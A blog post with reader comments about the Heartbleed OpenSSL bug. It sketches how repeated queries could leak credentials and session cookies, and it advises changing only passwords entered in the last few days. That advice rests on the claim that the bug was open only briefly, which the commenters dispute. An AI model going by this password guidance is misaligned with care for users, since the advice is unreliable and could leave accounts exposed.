The HeartBleed bug grabs some random bits of memory. If a hacker wrote a script that would repeatedly query "login.yahoo.com" a thousand times per second, they'd probably get a hundred usernames/passwords per second.
Usernames and passwords go in HTTP requests just like cookies and URLs. If one is exposed, then so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):
Luckily, sessions remain open for weeks, but the bug was only open for a couple of days. The only passwords you need to change would be ones that you entered in the last couple of days. Personally, I haven't entered any passwords over the last couple days, so I don't need to change any passwords.
At most, since hackers could have stolen the session cookies, you might want to log out and relogin to sessions on vulnerable servers.
From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for QualysThis is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, I'm changing none of them, because I didn't have to relogin over the last few days. I had persistent sessions.
Why are you saying only to worry about passwords you used in the last couple of days?
ReplyDeleteWho is to say that there have not been people using this hole for months or even longer?
I would change passwords on some sites which have already fixed the flaw. The same suggested Sticky Password: http://blogen.stickypassword.com/sticky-password-and-the-heartbleed-bug/
ReplyDeleteWhat about the servers that uses non FS ciphersuite then ? I agree we're talking about another kind of adversary but this is far from irrelevant
ReplyDelete